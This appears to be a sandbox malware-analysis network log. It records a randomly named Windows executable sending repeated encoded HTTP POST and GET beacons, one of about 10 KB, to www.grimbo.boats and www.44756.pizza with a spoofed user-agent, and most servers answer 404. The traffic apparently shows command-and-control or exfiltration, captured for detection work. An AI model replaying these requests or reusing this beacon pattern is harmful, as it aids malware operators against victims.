                                                                    Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                    Jan 3, 2025 11:40:07.550700903 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                    Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                    Jan 3, 2025 11:40:07.550712109 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                    Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                    Jan 3, 2025 11:40:07.550729036 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                    Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                    Jan 3, 2025 11:40:07.550740957 CET776INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                                    Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                                    Jan 3, 2025 11:40:07.550755024 CET1236INData Raw: 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35
                                                                    Data Ascii: (c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeE
                                                                    Jan 3, 2025 11:40:07.550766945 CET884INData Raw: 2b 2b 64 29 68 3c 3d 28 43 3d 74 5b 64 5d 29 26 26 43 3c 6c 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63
                                                                    Data Ascii: ++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.449859104.21.18.171801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:12.594893932 CET731OUTPOST /kxtt/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.grimbo.boats
                                                                    Origin: http://www.grimbo.boats
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.grimbo.boats/kxtt/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 54 41 64 49 41 50 49 65 4a 46 78 68 37 77 52 31 79 41 63 50 75 4a 6e 52 62 4b 78 77 39 7a 76 47 34 4a 48 33 37 70 54 46 45 38 44 57 76 50 2f 48 34 6f 72 75 47 59 46 51 52 56 6c 6a 4f 62 71 74 74 70 47 6d 31 79 6a 33 58 42 70 4b 52 2f 30 4f 65 51 30 38 74 78 42 31 4d 73 49 30 6d 6a 35 42 47 77 63 59 73 61 7a 66 32 7a 61 75 48 6c 49 6c 39 39 58 53 36 66 73 72 53 6b 51 73 30 75 45 63 67 58 36 30 5a 4b 47 56 75 4d 73 77 64 7a 6d 58 36 57 6e 53 4f 77 35 4a 65 6f 32 37 7a 58 6d 72 34 2f 6f 34 50 78 73 74 74 78 4c 56 72 4e 58 45 70 77 5a 7a 53 41 58 65 34 51 57 4c 41 35 58 6c 6b 41 3d 3d
                                                                    Data Ascii: 1V=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr4/o4PxsttxLVrNXEpwZzSAXe4QWLA5XlkA==
                                                                    Jan 3, 2025 11:40:13.230781078 CET1091INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:13 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fDiyxrkpkK%2FuFGML0uUap2rQ3EptqY%2FciHyVTk%2FNdUhiG4kev%2FShO5TweBIYXcFtkHMlwbI4rK8MJmw3cQZK%2B%2BmBhgD0TBQWou7b1hc4N8M5lF%2BFepssTAhFF9Tl22R7fequ"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc25e912fc780d6-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.449875104.21.18.171801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:15.206708908 CET751OUTPOST /kxtt/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.grimbo.boats
                                                                    Origin: http://www.grimbo.boats
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.grimbo.boats/kxtt/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 33 57 73 76 50 48 71 63 66 75 44 59 46 51 4a 46 6c 6d 52 4c 71 69 74 70 4b 75 31 32 72 33 58 42 39 4b 52 36 49 4f 64 6a 4d 2f 73 68 42 33 4e 63 49 32 6c 54 35 42 47 77 63 59 73 61 6d 34 32 7a 69 75 48 57 51 6c 38 59 6a 56 7a 2f 73 6b 56 6b 51 73 2b 4f 45 51 67 58 37 54 5a 4c 71 2f 75 4a 77 77 64 7a 57 58 36 6e 6e 64 41 77 34 43 51 49 33 6b 6c 58 58 33 78 61 64 54 50 51 45 71 6f 41 72 74 75 4c 61 65 34 42 34 6b 41 41 7a 74 6c 58 66 2f 4e 36 71 73 2f 4a 47 4f 35 6f 44 67 7a 39 35 41 75 37 6a 33 47 45 6e 59 61 74 30 3d
                                                                    Data Ascii: 1V=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAAztlXf/N6qs/JGO5oDgz95Au7j3GEnYat0=
                                                                    Jan 3, 2025 11:40:15.806989908 CET1098INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:15 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2FUGwMqTdDiIcJ%2BONzJV8j27%2BqDZosSTp2pYPNUtQt7njdRmSvWk29Z15FzbqpSeELWxkW3qz%2FPje%2BVozuX%2F%2BqSqNOgKrpzQ4lYXCfPKG52R7FwUK%2B5NjdJN3J6JTorjTpY2"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc25ea14f97428b-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.449891104.21.18.171801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:17.848890066 CET10833OUTPOST /kxtt/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.grimbo.boats
                                                                    Origin: http://www.grimbo.boats
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.grimbo.boats/kxtt/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 50 57 76 65 76 48 34 4c 44 75 45 59 46 51 58 56 6c 6e 52 4c 71 46 74 71 36 71 31 32 76 6e 58 43 46 4b 65 2f 45 4f 57 79 4d 2f 6c 68 42 33 47 38 49 31 6d 6a 34 4a 47 77 4d 63 73 61 32 34 32 7a 69 75 48 51 38 6c 37 4e 58 56 31 2f 73 72 53 6b 51 67 30 75 45 38 67 58 79 73 5a 4c 66 4b 75 64 38 77 64 54 47 58 70 46 2f 64 4d 77 34 41 54 49 33 73 6c 58 62 65 78 63 35 31 50 51 41 4d 6f 41 66 74 69 50 79 48 76 42 49 34 5a 51 72 49 33 67 7a 62 45 49 44 6f 2b 4c 71 48 2b 39 66 30 6e 38 4a 4a 6a 38 57 77 63 78 50 74 50 4a 46 35 64 51 50 56 45 6c 4c 73 77 71 4e 48 33 42 7a 32 39 6a 53 73 54 39 64 4b 4b 50 74 59 58 62 35 2f 47 36 64 52 4c 6e 63 59 75 52 43 53 75 32 68 6e 38 4a 33 68 73 39 61 56 39 51 36 59 34 4e 63 37 6e 49 6d 78 74 65 78 39 33 31 76 78 37 54 31 6e 33 69 52 48 37 72 43 31 70 66 78 5a 33 78 30 6c 65 61 42 57 79 4b 78 70 61 39 76 2f 78 31 47 6c 35 48 55 6b 58 52 2b [TRUNCATED]
                                                                    Data Ascii: 1V=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEOPWvevH4LDuEYFQXVlnRLqFtq6q12vnXCFKe/EOWyM/lhB3G8I1mj4JGwMcsa242ziuHQ8l7NXV1/srSkQg0uE8gXysZLfKud8wdTGXpF/dMw4ATI3slXbexc51PQAMoAftiPyHvBI4ZQrI3gzbEIDo+LqH+9f0n8JJj8WwcxPtPJF5dQPVElLswqNH3Bz29jSsT9dKKPtYXb5/G6dRLncYuRCSu2hn8J3hs9aV9Q6Y4Nc7nImxtex931vx7T1n3iRH7rC1pfxZ3x0leaBWyKxpa9v/x1Gl5HUkXR+JHWSi1ScDajLEY61lYUShhOP+yKN9xeRv6mPIKR3aVyF9lFQIhgotY+c1lKY80jR62VVg9JTCTGkLZLRmU8sYXWT2Qd/H/SQ2/Z6kxOEZVe+sRTloM+TdzFutBz2W7pcywZBjWBnIjZMxtE/nwy41mNOEJwnuNBvn7inys206mttnV2u+xowz8CBy049O8QBoReZFsEhEs8oTb0Zl64ADvK0+DLrjfDnJTds9VUPZY9BgI4hKl3v3Ttm2Vh6+aGct8bsJ2Xr1Ttqp/hf8S49lCE0HOhU6zu+m4qtfEM4qVuEKBYJzdg85xmn6NyH2YtvA8lG52YdoQ8/ZArE9jMIz6/iO97fWkxk9ySkbEwqyjtoNTIzdWpI/UuZLBlj0mWU0Tgqx+FGmoRMiQxAfEf9hWZCRTT12VwOios34Xvqd2s7ugZQn50ups3zuc8Ft05fp3tX1F9bKPAbT8e2PIGj3DNza0FhQnNPM3C6FvXkvL/VCdPTH0eydAoxf4Q1rC6Tosc/gN7zbljconzTBIXkXxAWnLIp6Mf1/nVcUcuMFnXs7Wkr2LDaFmYfo33ruh9aPklPJoKp1r3gfQkgVxtLi1fzGLRw21pSXCSGq38fOJmnFHK4X+Q0MDdM+do88WQnrDFzoJKvXl5D6iPtCcQB08i1H+V0nA6q8o [TRUNCATED]
                                                                    Jan 3, 2025 11:40:18.424420118 CET1091INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:18 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4CLRCpe2cnLf4N1URG%2BkjTJhyg0CluvUJbhOL%2Fystyo5JCe9G7Al9MreSp13dHPYMUYGFsCt7XgojiAjkC%2F3H1Z0AEevAlHa7DKOf0elEjdKsxR9uc7vlLd0qQg2dG9l0v6E"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc25eb19b6a187d-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=811&sent=5&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10833&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.449912104.21.18.171801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:20.387032986 CET467OUTGET /kxtt/?w0DDw=KH0hz6&1V=eC1oD4IhFSd/6jtM+gh2zJzzIbkctzW5zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhx4kXv42kRkXOBgymbjdyCqqE2F8kr6Zzpg= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.grimbo.boats
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:21.031281948 CET1099INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:20 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ly%2Fd9RibHA84VfMWqJwvyJ5obQbaW1gfczgzjCecOgQwB1eSOMtWx9AQFSWnL9Zfoq8UH4xvSHBOKRENJ%2BZvl0EXa95vtbvY%2FHUVvUOcC62S2xStTePS678fYAnMR7TajF14"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc25ec1daa24239-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=467&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.449953134.122.133.80801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:26.381134987 CET728OUTPOST /a59t/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.44756.pizza
                                                                    Origin: http://www.44756.pizza
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.44756.pizza/a59t/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 68 70 70 78 36 37 6c 37 6a 35 66 67 30 63 62 6f 45 6f 4e 4e 6a 62 77 67 67 56 4f 4f 49 69 78 41 49 32 34 5a 34 51 62 4b 68 77 67 45 56 6d 50 44 7a 4a 4d 63 38 65 37 2f 46 6e 58 4b 4d 30 70 35 4c 45 70 68 36 36 51 70 76 75 75 61 69 62 75 61 46 56 70 56 48 72 76 52 47 45 57 42 62 31 78 6e 64 52 58 64 6a 64 45 78 67 4e 70 6d 74 6f 39 4b 2b 63 41 73 42 47 50 47 47 5a 6f 31 47 71 50 4f 4b 4c 56 68 39 62 35 55 45 61 56 5a 4a 6b 4f 4e 73 33 56 70 54 35 79 78 4d 4e 51 57 4b 5a 5a 6d 69 46 57 30 65 43 64 33 49 58 53 6a 53 59 61 79 52 75 58 42 41 3d 3d
                                                                    Data Ascii: 1V=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpT5yxMNQWKZZmiFW0eCd3IXSjSYayRuXBA==
                                                                    Jan 3, 2025 11:40:27.236280918 CET312INHTTP/1.1 404 Not Found
                                                                    Content-Length: 148
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:40:27 GMT
                                                                    Etag: "6743f11f-94"
                                                                    Server: nginx
                                                                    Connection: close
                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
